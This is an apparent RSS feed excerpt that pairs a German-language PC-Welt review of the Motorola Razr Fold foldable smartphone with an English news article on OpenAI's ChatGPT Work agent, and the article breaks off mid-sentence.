<p>Ich bezweifle, dass Motorolas Vision eines Falt-Smartphones für knapp 2.000 Euro zum aktuellen Zeitpunkt noch viele Anhänger finden wird. Gemessen an den begrenzten Rahmenbedingungen, die Samsung vor sieben Jahren mit dem ersten Galaxy Fold vorgegeben hat, ist das Razr Fold jedoch ein beeindruckendes Stück Hardware.</p>



<h2 class="wp-block-heading">Design &amp; Verarbeitung</h2>



<ul class="wp-block-list">
<li>9,89 mm dünn (geschlossener Zustand) und 243 g leicht</li>



<li>Hochwertige Materialien</li>



<li>Solides Scharnier</li>



<li>IP48/IP49-Zertifizierung gegen Staub und Wasser</li>
</ul>



<p>Das Razr Fold wirkt weniger wie ein überkonstruierter Prototyp, sondern eher wie ein stimmiges Smartphone, das ich mir gut im täglichen Gebrauch vorstellen kann. Mit 160,05 × 73,6 × 9,89 Millimetern im geschlossenen Zustand (4,55 Millimeter im aufgeklappten Zustand) und einem Gewicht von 243 Gramm ist es jedoch einen ganzen Millimeter dicker und 28 Gramm schwerer als das <a href="https://www.pcwelt.de/article/2843601/samsung-galaxy-z-fold-7-test.html" target="_blank">Samsung Galaxy Z Fold 7</a>.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-19.34.55.png?w=1024" alt="Motorola Razr Fold" class="wp-image-4195178" width="1024" height="604" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Jon Mundy / Foundry</p></div>



<p>Das Design erinnert an das schlanke, hochwertige <a href="https://www.pcwelt.de/article/3068644/motorola-signature-test.html" target="_blank">Motorola Signature</a>, wurde hier aber auf die deutlich größere Fläche eines Foldables übertragen. Die abgerundeten Kanten und die griffigen Materialien wirken dabei nicht nur edel, sondern auch alltagstauglich. Das Smartphone liegt gut in der Hand. Das Gewicht ist gleichmäßig verteilt. Das fließend gestaltete Kameramodul bietet zudem eine praktische Auflage für Ihre Finger.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-19.34.59.png?w=1024" alt="Motorola Razr Fold" class="wp-image-4195179" width="1024" height="604" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Jon Mundy / Foundry</p></div>



<p>Auch das Scharnier ist hervorragend abgestimmt. Es ist straff genug, macht das Öffnen aber nicht unnötig schwer. Die Rundungen des Gehäuses sorgen für mehr Halt an den Kanten, den ein flacheres Gerät wie das Galaxy Z Fold 7 so nicht bietet. Hier merkt man deutlich, dass Motorola viel Erfahrung aus den bisherigen Razr-Modellen mitgenommen hat.</p>



<p>Das grundlegende Problem der Bauform löst Motorola damit allerdings nicht. Die IP48/IP49-Zertifizierung bietet einen ausgezeichneten Schutz gegen Wasser, bleibt beim Thema Staub aber auf dem Niveau anderer Foldables. Eine Ausnahme bildet hier nur das <a href="https://www.pcwelt.de/article/2945312/google-pixel-10-pro-test-3.html" target="_blank">Google Pixel 10 Pro Fold</a>.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-19.35.02.png?w=1024" alt="Motorola Razr Fold" class="wp-image-4195180" width="1024" height="604" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Jon Mundy / Foundry</p></div>



<p>Die Position der KI-Taste gefällt mir jedoch nicht. Sie ist im Grunde nur wirklich sinnvoll nutzbar, wenn das Smartphone aufgeklappt ist. Im geschlossenen Zustand sitzt sie ungünstig über den Lautstärketasten. Sie können sie außerdem nicht frei belegen.</p>



<p>Auch bei der Farbauswahl hätte ich mir bei Motorola mehr Mut gewünscht. Die Pantone-Optionen Blackened Blue und Lily White wirken zwar hochwertig und klassisch, ein oder zwei zusätzliche, lebendigere Farben hätten dem Foldable aber gut gestanden.</p>



<h2 class="wp-block-heading">Bildschirm &amp; Lautsprecher</h2>



<ul class="wp-block-list">
<li>Außen: 6,56 Zoll, FHD, pOLED, 165 Hz</li>



<li>Innen: 8,09 Zoll, 2K, pOLED, 120 Hz</li>



<li>Moto Pen Ultra-Stift im Lieferumfang enthalten</li>



<li>Dolby Atmos-Stereolautsprecher</li>
</ul>



<p>Das Motorola Razr Fold bietet zwei helle und flüssige Displays. Außen findet sich ein großes Cover-Display mit einer ungewöhnlich hohen Bildwiederholrate von bis zu 165 Hetz im Gaming-Betrieb. Überdies erreicht es in HDR-Szenen eine Spitzenhelligkeit von bis zu 6.000 Nits.</p>



<p>Das innere Display verzichtet auf diese höhere Frequenz und bleibt bei 120 Hertz. Dafür punktet es mit seiner Größe, einer nur dezenten, wenn auch sichtbaren Falte und einer extrem hohen Spitzenhelligkeit von bis zu 6.200 Nits. Die beiden Bildschirme sind gut aufeinander abgestimmt. Zusammen liefern sie ein scharfes, flüssiges und farblich stimmiges Bild.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-19.35.06.png?w=1024" alt="Motorola Razr Fold" class="wp-image-4195181" width="1024" height="604" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Jon Mundy / Foundry</p></div>



<p>Beim Razr Fold stehen drei unterschiedliche Farbeinstellungen für die Displays zur Auswahl: Vivid, Radiant und Natural. Auch ohne Kolorimeter fand ich die Farbintensität und Präzision bei “Radiant” besonders gut ausbalanciert.</p>



<p>Bei der Position der internen Selfie-Kamera hat sich Motorola eher von Google als von Samsung inspirieren lassen. Die Linse sitzt in der oberen rechten Ecke des Bildschirms. Dadurch stört sie beim Surfen im Vollbildmodus nicht zu sehr.</p>



<p>Nachdem Samsung die Unterstützung für den S Pen beim Galaxy Z Fold 7 aufgegeben hat, ist Motorolas Integration des Moto Pen Ultra besonders lobenswert. Er ist im Lieferumfang enthalten und unterstützt Sie beim Notieren und Skizzieren auf beiden Displays.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-19.35.10.png?w=1024" alt="Motorola Razr Fold" class="wp-image-4195182" width="1024" height="604" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Jon Mundy / Foundry</p></div>



<p>Der Moto Pen Ultra ist jedoch nicht wie bei Samsungs <a href="https://www.pcwelt.de/article/3084372/samsung-galaxy-s26-ultra-test-2.html" target="_blank">Galaxy S26 Ultra</a> nahtlos ins Smartphone-Gehäuse integriert. Stattdessen wird er mit einem sperrigen (wenn auch gut verarbeiteten) Ladeetui in Zigarrengröße geliefert.</p>



<p>Für einen runden Klang sorgen zwei Dolby-Atmos-fähige Stereolautsprecher. Die Qualität ist gut, wenn auch bei höheren Lautstärken etwas zu höhenbetont und schrill. Die Lautsprecher sind solide, können es jedoch nicht mit Apples <a href="https://www.macwelt.de/article/2903816/iphone-17-pro-neu.html" target="_blank">iPhone 17 Pro</a> aufnehmen.</p>



<h2 class="wp-block-heading">Ausstattung &amp; Rechenleistung</h2>



<ul class="wp-block-list">
<li>Älterer Qualcomm Snapdragon 8 Gen 5-Chip</li>



<li>16 GB LPDDR5X-RAM</li>



<li>Nur eine Speicheroption mit 512 GB</li>
</ul>



<p>Motorola verbaut im Razr Fold genau dieselben Komponenten wie im Flaggschiff-Modell “Signature“. Auch hier werkeln der Qualcomm Snapdragon 8 Gen 5-Chip mit 16 Gigabyte RAM und es gibt nur eine Speicheroption mit 512 Gigabyte.</p>



<p>Der Snapdragon 8 Gen 5 ist mittlerweile ein etwas älterer Chip, der bereits um die Jahreswende abgelöst wurde. Bei einem Smartphone für 1.399 Euro wie dem Motorola Signature ist das vielleicht nur eine interessante Beobachtung. Beim Fold jedoch, das mit knapp 2.000 Euro zu Buche schlägt, ist das ein Kritikpunkt. Insbesondere dann, wenn das <a href="https://www.pcwelt.de/article/2843601/samsung-galaxy-z-fold-7-test.html" target="_blank">Galaxy Z Fold 7</a> mit einem neueren Prozessor zu einem ähnlichen Preis angeboten wird.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-19.35.13.png?w=1024" alt="Motorola Razr Fold" class="wp-image-4195183" width="1024" height="604" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Jon Mundy / Foundry</p></div>



<p>Im Alltag wirkt das Razr Fold jedoch nicht weniger leistungsfähig als seine faltbaren Konkurrenten. In Benchmark-Tests übertrifft es das Google Pixel 10 Pro Fold sogar. Auch wenn Sie die 165-Hertz-Funktion nicht of nutzen, macht sich beim Spielen von “Destiny Rising” die flüssige Darstellung sehr positiv bemerkbar. Auch die Bedienung ist stets flüssig, mit sanften Animationen, nahtlosen Übergängen und verzögerungsfreiem Multitasking.</p>



<h2 class="wp-block-heading">Motorola Razr Fold Benchmarks</h2>



<div class="infogram-embed" data-id="b0e6955f-8b3d-4779-b17b-ade9d56e6d92" data-type="interactive" data-title="Motorola Razr Fold benchmarks"></div>




<h2 class="wp-block-heading">Kameras</h2>



<ul class="wp-block-list">
<li>50 MP, f/1,6 Hauptkamera auf der Rückseite</li>



<li>50 MP, f/2,0 Ultraweitwinkel mit 120-Grad-Sichtfeld</li>



<li>50 MP, f/2,4, 3-fach-Teleobjektiv</li>



<li>20-MP- und 32-MP-Selfie-Kameras</li>
</ul>



<p>Im Razr Fold kommt das bekannte Motorola-Dreifach-Kamerasystem mit drei 50-Megapixel-Sensoren zum Einsatz. Das zahlt sich hier besonders aus, denn faltbare Smartphones haben oft eine schlechtere Kamera-Ausstattung als ihre nicht faltbaren Pendants. Das Razr Fold macht in nahezu allen Situationen sehr gute Fotos.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-19.35.17.png?w=1024" alt="Motorola Razr Fold" class="wp-image-4195185" width="1024" height="604" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Jon Mundy / Foundry</p></div>



<p>Der relativ große 1/1,28-Zoll-Hauptsensor in Kombination mit der großen Offenblende von f/1,6 sorgt dafür, dass Aufnahmen bei Tageslicht scharf und hell ausfallen. Auch die Bildverarbeitung von Motorola scheint sich deutlich verbessert zu haben. Die Bilder wirken lebendiger und bieten mehr Kontrast. Davon profitieren unter anderem Porträts, bei denen ein natürliches Bokeh für Tiefe sorgt.</p>



<p>Nachtaufnahmen gelingen ebenfalls sehr detailliert. Sie sind jedoch nicht ganz auf dem Niveau der aktuell besten Kamera-Smartphones <a href="https://www.pcwelt.de/article/2894857/google-pixel-10-pro-test-2.html" target="_blank">Google Pixel 10 Pro</a> und <a href="https://www.pcwelt.de/article/3131894/xiaomi-17-ultra-test.html" target="_blank">Xiaomi 17 Ultra</a>.</p>



<p>Die 50-Megapixel-Ultraweitwinkelkamera liefert gute Ergebnisse bei Landschaftsaufnahmen und erzeugt detailreiche Bilder ohne übermäßige Randverzerrung und mit einem gleichmäßigen Farbtonaufbau. Diese Kamera eignet sich auch für Makroaufnahmen, weil sie eine sehr geringe Naheinstellgrenze bietet.</p>



<p>Die 50-Megapixel-Tele-Kamera ermöglicht Aufnahmen mit nativem Dreifach-Zoom. Sie sollten jedoch nicht zu weit über den Sechsfach-Zoom (maximal Zehnfach-Zoom) hinausgehen, weil die Detailgenauigkeit hier stark abnimmt. Insbesondere der 50-fache und der 100-fache Zoom sind nahezu unbrauchbar.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-19.35.21.png?w=1024" alt="Motorola Razr Fold" class="wp-image-4195187" width="1024" height="604" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Jon Mundy / Foundry</p></div>



<p>Ein weiterer Kritikpunkt: Nach einer etwa einstündigen Foto- und Videosession mit 4K-Aufnahmen wurde das Razr Fold in meinem Test unangenehm heiß.</p>



<p>Es gibt zwei mittelmäßige Frontkameras, eine 20-Megapixel-Kamera auf der Vorderseite und eine 32-Megapixel-Kamera auf der Innenseite, die passable Selfies liefern. Nutzen Sie jedoch lieber die Sucherfunktion des externen Displays und machen Sie Ihre Selbstporträts mit der Hauptkamera. Hier erzielen Sie deutlich bessere Ergebnisse.</p>



<h2 class="wp-block-heading">Akkulaufzeit &amp; Aufladen</h2>



<ul class="wp-block-list">
<li>6.000-mAh-Silizium-Kohlenstoff-Akku</li>



<li>80 W kabelgebundenes Laden</li>



<li>50 W kabelloses Laden</li>
</ul>



<p>Mit dem großzügigen 6.000-Milliamperestunden-Akku nimmt Motorola eine weitere Schwäche von Falt-Smartphones ins Visier. Er ist sogar größer als der Stromspeicher im Motorola Signature, ganz zu schweigen vom Samsung Galaxy Z Fold 7 (4.400 Milliamperestunden) und dem Google Pixel 10 Pro Fold (5.050 Milliampersetunden).</p>



<p>Interessanterweise liegt er im PCMark 3.0 Work-Batterietest, der auf dem großen internen Display durchgeführt wurde und eine gemischte Produktivitätslast simuliert, weiterhin deutlich hinter Googles Foldable. Mit knapp elf Stunden übertrifft er jedoch klar Samsungs aktuelles Foldable-Topmodell. Mit einer Akkuladung sollten Sie also problemlos über den Tag kommen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-19.35.25.png?w=1024" alt="Motorola Razr Fold" class="wp-image-4195188" width="1024" height="604" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Jon Mundy / Foundry</p></div>



<p>Wenn der Akku doch einmal leer ist, können Sie ihn mit beeindruckenden 80 Watt per Kabel wieder aufladen. Im Lieferumfang ist leider kein Netzteil enthalten. Mit einem 120-Watt-Ladegerät von Vivo gelang es mir dennoch, die charakteristische TurboPower-Anzeige zu aktivieren.</p>



<p>Das Smartphone erreichte nach 15 Minuten Ladezeit bei leerem Akku 31 Prozent. Nach 30 Minuten waren es bereits 54 Prozent. Eine vollständige Aufladung dauerte etwas mehr als eine Stunde. Kabellos laden kann das Razr Fold mit 50 Watt.</p>



<h2 class="wp-block-heading">Benutzeroberfläche &amp; Apps</h2>



<ul class="wp-block-list">
<li>Android 16</li>



<li>7 Jahre Software-Updates</li>



<li>Zu viel Bloatware</li>



<li>Verwirrende KI-Funktionen</li>
</ul>



<p>In den vergangenen Jahren hat sich Motorola zunehmend von seinem einst guten Ruf für eine schlanke Benutzeroberfläche distanziert und stattdessen mehr eigene Anpassungen sowie zusätzliche Drittanbieter-Apps integriert. Dennoch bietet Android 16 auf dem Razr Fold nach wie vor eine relativ übersichtliche Benutzeroberfläche.</p>



<p>Mir gefällt die Moto-App von Motorola, die als praktische Einführung in die Funktionen des Smartphones dient. Dazu gehören auch die Gesten von Motorola, die praktische Abkürzungen bieten, wenn Sie das Smartphone beispielsweise zweimal schütteln. Auf die vorinstallierten Apps von Amazon Music, LinkedIn, Opera, Facebook und Instagram könnte ich aber verzichten.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-19.35.29.png?w=1024" alt="Motorola Razr Fold" class="wp-image-4195189" width="1024" height="604" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Jon Mundy / Foundry</p></div>



<p>Motorola gehört zu den Herstellern, die KI-Funktionen eher breit einstreuen, statt einen klar fokussierten Ansatz zu verfolgen. Googles Gemini nimmt einen Ehrenplatz auf dem ersten Startbildschirm ein, unweit von Motorolas eigener Moto-AI-App.</p>



<p>Letztere ist eine ansprechend gestaltete Sammlung grundlegender Tools. Hier finden sich Werkzeuge zur Erstellung von KI-Kunstwerken, zur Transkription von Notizen oder zum Speichern von Screenshot-Erinnerungen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-19.35.32.png?w=1024" alt="Motorola Razr Fold" class="wp-image-4195190" width="1024" height="604" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Jon Mundy / Foundry</p></div>



<p>Diese Funktionen hätten meiner Meinung nach schon ausgereicht. Motorola hat jedoch noch die Drittanbieter-Assistenten “Perplexity” und “Copilot” vorinstalliert. Da verliert man schnell die Übersicht.</p>



<p>Motorola verspricht sieben Jahre Android-Updates und bringt das Razr Fold damit in Hinblick auf Software-Support auf Augenhöhe mit dem Samsung Galaxy Z Fold 7 und dem Google Pixel 10 Pro Fold.</p>



<h2 class="wp-block-heading">Preis &amp; Verfügbarkeit</h2>



<p>Das Motorola Razr Fold ist bei Amazon aktuell ab <a href="https://www.pcwelt.de/article/3168239/motorola-razr-fold-test.html#" target="_blank">1.789 Euro</a> erhältlich. Damit ist es fast 300 Euro teurer als das Google PIxel 10 Pro Fold für <a href="https://www.pcwelt.de/article/3168239/motorola-razr-fold-test.html#" target="_blank">1.444 Euro</a>. Das Samsung Galaxy Z Fold 7 kostet mit der gleichen Speicher-Ausstattung <a href="https://www.pcwelt.de/article/3168239/motorola-razr-fold-test.html#" target="_blank">1.744 Euro</a>.</p>



<h2 class="wp-block-heading">Fazit</h2>



<p>Das Motorola Razr Fold ist ein sehr elegantes, überraschend stimmiges, faltbares Smartphone mit zwei hervorragenden Displays, leistungsstarken Kameras und einer guten Akkulaufzeit. Es ist vielleicht nicht so schlank und leicht wie das Samsung Galaxy Z Fold 7, doch sein durchdachtes Design macht die Alltagsnutzung überraschend unkompliziert.</p>



<p>Schwächen finden sich bei der nicht mehr topaktuellen Prozessor-Ausstattung und beim relativ hohen Preis. Dennoch ist das Razr unter anderem dank seiner tollen Kamera-Ausstattung und der umfassenden Softwareunterstützung ein starker Konkurrent für Google und Samsung.</p>



<h2 class="wp-block-heading">Technische Daten</h2>



<ul class="wp-block-list">
<li>Android 16</li>



<li>Außen: 6,56 Zoll, FHD, pOLED, 165 Hz, 2,5D-Display</li>



<li>Innen: 8,09 Zoll, 2K, pOLED, 120 Hz, flaches Display</li>



<li>Seitlich angebrachter Fingerabdrucksensor</li>



<li>Qualcomm Snapdragon 8 Gen 5</li>



<li>16 GB LPDDR5X-RAM</li>



<li>512 GB Speicher</li>



<li>50 MP, f/1,6 Hauptkamera</li>



<li>50-MP-Ultraweitwinkel-Makro-Kamera mit f/2,0</li>



<li>50-MP-Tele-Makro-Kamera mit f/2,4</li>



<li>Videoaufnahmen mit bis zu 8K bei 30 fps (Rückseite)</li>



<li>20-MP- und 32-MP-Frontkameras</li>



<li>Dolby Atmos-Stereolautsprecher</li>



<li>eSIM und physische SIM-Karte</li>



<li>WLAN 802.11 a/b/g/n/ac/6e/7</li>



<li>Bluetooth 6</li>



<li>6.000-mAh-Akku</li>



<li>80W kabelgebundenes Laden</li>



<li>50 W kabelloses Laden</li>



<li>160,05 × 73,6 × 9,89 mm (zusammengeklappt)</li>



<li>243 g</li>



<li>Verfügbare Farben: Lily White, Blackened Blue</li>
</ul>



<p>(<a href="https://www.pcwelt.de/article/3168239/motorola-razr-fold-test.html" data-type="link" data-id="https://www.pcwelt.de/article/3168239/motorola-razr-fold-test.html" target="_blank">PC-Welt</a>)</p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI introduces ChatGPT Work, a cloud-based AI agent that manages tasks across email, Slack and calendars]]></title>
<description><![CDATA[OpenAI on Thursday launched ChatGPT Work, a new AI agent embedded inside its flagship chatbot that aims to transform ChatGPT from a question-and-answer tool into an autonomous work platform capable of executing complex, multi-step tasks across users' email, calendars, code repositories, and messa...]]></description>
<link>https://tsecurity.de/de/3660793/it-nachrichten/openai-introduces-chatgpt-work-a-cloud-based-ai-agent-that-manages-tasks-across-email-slack-and-calendars/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660793/it-nachrichten/openai-introduces-chatgpt-work-a-cloud-based-ai-agent-that-manages-tasks-across-email-slack-and-calendars/</guid>
<pubDate>Fri, 10 Jul 2026 22:48:07 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://openai.com/">OpenAI</a> on Thursday launched <a href="https://openai.com/index/chatgpt-for-your-most-ambitious-work/">ChatGPT Work</a>, a new AI agent embedded inside its flagship chatbot that aims to transform ChatGPT from a question-and-answer tool into an autonomous work platform capable of executing complex, multi-step tasks across users' email, calendars, code repositories, and messaging apps.</p><p>The product is powered by OpenAI's latest flagship model, <a href="https://openai.com/index/gpt-5-6/">GPT-5.6</a>, and is designed to go far beyond generating text. ChatGPT Work can gather context from connected apps, files, and workflows to produce finished documents, spreadsheets, presentations, reports, and websites. The agent takes a stated outcome, breaks it into smaller steps, and stays with complex projects for hours, completing them independently.</p><p>The launch marks OpenAI's clearest attempt yet to reposition ChatGPT as a workplace platform rather than a chatbot — and it arrives at a moment of extraordinary financial significance for the company. Last month, OpenAI <a href="https://openai.com/index/openai-submits-confidential-s-1/">confidentially submitted a draft S-1 registration statement</a> to the SEC, initiating what could become one of the largest technology IPOs in history, with reported valuations <a href="https://www.cnbc.com/2026/03/31/openai-funding-round-ipo.html">clustering between $730 billion and $852 billion</a> and annualized revenue that has blown past $25 billion.</p><p>In a short demonstration and conversation with VentureBeat on Friday, Ty Geri, a product manager at OpenAI who helped build ChatGPT Work, said the product's mission is to democratize the kind of agentic AI capabilities that OpenAI's internal engineering tool, Codex, has already demonstrated. "What's really exciting is we've seen how much Codex has been able to push the frontier of what we can get done with these AI tools, as opposed to just getting information or answers or guidance," Geri said. "Our internal adoption of Codex is literally an exponential curve across every single product function and every single use case."</p><h2><b>Why OpenAI built a persistent virtual machine that works from the beach</b></h2><p>The core architectural bet behind <a href="https://openai.com/index/chatgpt-for-your-most-ambitious-work/">ChatGPT Work</a> is a persistent cloud-based virtual machine that runs on OpenAI's servers, always available to the user regardless of which device they happen to be on. That marks a deliberate departure from competitors whose agents require a local machine to remain powered on and connected.</p><p>"What's really exciting about ChatGPT Work is that it's a virtual machine in the cloud that's always on for you, and this is available across all of our paid tiers," Geri said. "All Plus users are getting this. I think that's a very unique aspect of this."</p><p>The mobile-first aspect of the launch is something Geri described as "missing from the market." He pointed to the ability to create a website on a phone and share it with collaborators as a particularly novel capability. "Sites are new in general to Codex. They launched in Codex about a week and a half ago, but now we're launching also in web and mobile. You can create a site on your phone at the beach and share it with your friends," he said.</p><p><a href="https://openai.com/index/chatgpt-for-your-most-ambitious-work/">ChatGPT Work</a> will roll out beginning with <a href="https://chatgpt.com/pricing/?utm_source=google&amp;utm_medium=paid_search&amp;utm_campaign=GOOG_C_SEM_GBR_Premium_CHT_BAU_ACQ_PER_MIX_ALL_NAMER_US_EN_081125&amp;c_id=22874197666&amp;c_agid=184333759620&amp;c_crid=778419668389&amp;c_kwid=kwd-1931160859103&amp;c_ims=&amp;c_pms=9061275&amp;c_nw=g&amp;c_dvc=c&amp;gad_source=1&amp;gad_campaignid=22874197666&amp;gbraid=0AAAAA-I0E5eVxMdRuuMlOhjqMjAi2KCBS&amp;gclid=Cj0KCQjwsMLSBhD9ARIsAIpUTDoJ61xQZv3XpwtAkZ20Et-Y9TM9_exet3Bh9O9h2kxVcpfmgHkyx68aAlw-EALw_wcB">Pro, Enterprise, and Edu users</a>, and will expand to Plus and Business users over the next few days. In the interview, Geri emphasized that the availability of the product to Plus subscribers — not just premium tiers — is central to OpenAI's strategy. "It's accessible to all paid plans, including Plus users, which in my opinion is a really big feat, and really part of that OpenAI mission, which is about bringing all this power to as many people," he said.</p><h2><b>How MCP plugins connect ChatGPT Work to Slack, Gmail, and GitHub</b></h2><p>The product relies on MCP-based plugins to connect to external services like Gmail, Google Calendar, Slack, and GitHub. When asked whether the plugin architecture is based on the <a href="https://modelcontextprotocol.io/docs/getting-started/intro">Model Context Protocol standard</a>, Geri confirmed: "These are all based on MCP." He added that connecting multiple Gmail accounts — a frequent user request — "is definitely on the roadmap."</p><p>The experience is designed to be action-oriented from the first interaction. <a href="https://openai.com/index/chatgpt-for-your-most-ambitious-work/">ChatGPT Work</a> offers a personalized onboarding flow that surfaces different suggested use cases depending on the user's role. Geri demonstrated how the system, detecting his role as a product manager, immediately suggested tasks like evaluating AI systems, building research artifacts, and managing his calendar. "You can start with a simple task like catch me up on Slack or Teams or read today's calendar," Geri said. He described a scenario where the system reviewed his calendar, identified scheduling conflicts, flagged meetings requiring preparation, and then — on his instruction — declined, accepted, or rescheduled events directly.</p><p>Users can also customize the agent by teaching it their writing style, organizing outputs into projects, and — in a lighter touch — choosing a virtual pet that accompanies them in the interface. The interface also introduces a hosted website feature that allows users to build and share interactive sites directly through ChatGPT Work, turning what would typically be a static slide deck into a dynamic, collaborative artifact. "Now we suddenly have a collaborative interface that's actually more exciting and more accessible than a slide deck, which has all these formatting restrictions," Geri said.</p><h2><b>Scheduling 10 bug bashes at once: what agentic productivity looks like in practice</b></h2><p>Geri's own usage of <a href="https://openai.com/index/chatgpt-for-your-most-ambitious-work/">ChatGPT Work</a> illustrates the breadth of tasks the system can handle. In the run-up to the product's launch, he needed to organize pre-release testing sessions — known internally as "bug bashes" — across dozens of features and team members.</p><p>"I just come to ChatGPT Work and say, 'Set up a bug bash for all the distinct features in ChatGPT Work. Add all the people that worked on that feature,' and it can check Slack, it can check GitHub, it can check Docs, and find a time that works for the four highest contributors to that feature," Geri said. "It went and scheduled 10 bug bashes, all coordinated across all those different people. That would have taken me 30 minutes at least."</p><p>But Geri pushed back against the characterization that <a href="https://openai.com/index/chatgpt-for-your-most-ambitious-work/">ChatGPT Work</a> is limited to rote administrative work. He described using it for analytically complex tasks like identifying the biggest causes of user churn for specific product features and generating product solutions — work he said would previously have taken months. "Things that we would have spent three months doing, we can now spend a week doing — and do much more, and make a much better product," Geri said. "Bugs that we would have found three or four weeks from now, we can now find within two days and fix for our users."</p><p>He also described handing off the tedium of product testing itself. "It used to be that even though like the most interesting part of my job is like what to test, I would actually end up having to spend most of my job doing the testing, which is like me taking a mouse and like clicking on the same thing over and over again, like five times," Geri said. "Instead, now I can define what do we want to test, and ChatGPT Work or Codex can actually go test it for me, deliver me that bug report, and then we can work on fixing that bug."</p><h2><b>What OpenAI says about data privacy when AI reads your Slack and email</b></h2><p>When pressed on data privacy concerns — given that ChatGPT Work pulls sensitive information from workplace tools like Slack, Google Drive, and email — Geri said privacy "is incredibly important, and the most important part of this is it's always in the user's control."</p><p>He pointed to OpenAI's existing enterprise security infrastructure, noting that "enterprise accounts have ZDR, and users can always opt out of letting their conversations help improve future models, which many users do." The comment aligns with assurances OpenAI made when it first launched ChatGPT Enterprise in August 2023, when the company wrote in a blog post that it does "<a href="https://openai.com/index/introducing-chatgpt-enterprise/">not train on your business data or conversations</a>."</p><p>The privacy question carries additional weight now because of the sheer volume of sensitive workplace data ChatGPT Work is designed to access. Unlike a chatbot session where a user voluntarily pastes text into a prompt, ChatGPT Work actively reaches into connected systems — reading Slack messages, scanning calendar invitations, pulling GitHub commit histories — to assemble context for its tasks. That represents a fundamentally different data surface area than anything OpenAI has offered before, and one that enterprise security teams will scrutinize carefully before granting access.</p><h2><b>ChatGPT Work enters a three-way arms race with Anthropic and Microsoft</b></h2><p>ChatGPT Work lands squarely in the middle of what has become the defining competitive battlefield in enterprise AI: the race to build autonomous workplace agents that can go beyond generating text and actually execute tasks.</p><p>The product arrives months after Anthropic took <a href="https://claude.com/product/cowork">Claude Cowork</a> out of preview and into general availability in April, bringing its AI agent to web and mobile platforms aimed at helping enterprise users monitor and manage long-running AI-driven tasks from anywhere. Meanwhile, Microsoft made <a href="https://www.microsoft.com/en-us/microsoft-365-copilot/cowork">Copilot Cowork</a> generally available worldwide on June 16, built in partnership with Anthropic to move beyond chat and into execution. The three products — ChatGPT Work, Claude Cowork, and Microsoft Copilot Cowork — now compete directly for the attention of enterprise IT departments and individual knowledge workers alike.</p><p>The convergence is striking. All three products share a remarkably similar vision: a persistent AI agent running in the cloud that can break complex tasks into steps, connect to workplace tools via plugins, and produce finished outputs rather than just conversational replies. All three work across desktop, web, and mobile.</p><p>What distinguishes OpenAI's approach is its raw consumer distribution advantage. ChatGPT has reached <a href="https://openai.com/index/scaling-ai-for-everyone/">900 million weekly active users</a>, and OpenAI now has <a href="https://openai.com/index/scaling-ai-for-everyone/">50 million paying subscribers</a>. More than 9 million paying business users rely on ChatGPT for work, and 92% of Fortune 500 companies now use ChatGPT. By making ChatGPT Work available to Plus subscribers at $20 a month — not just Enterprise or Pro customers — OpenAI is betting that broad accessibility will drive adoption faster than any competitor can match.</p><h2><b>OpenAI's product manager says AI is a partner, not a replacement — with a caveat</b></h2><p>When asked about the potential impact on the labor market, Geri was careful with his framing. He declined to speak broadly about workforce disruption but offered his personal experience as a product manager whose day-to-day work has been substantially reshaped by the tool.</p><p>"My job is not to schedule bug bashes and find out who contributed to a specific feature. That's a task I do in my 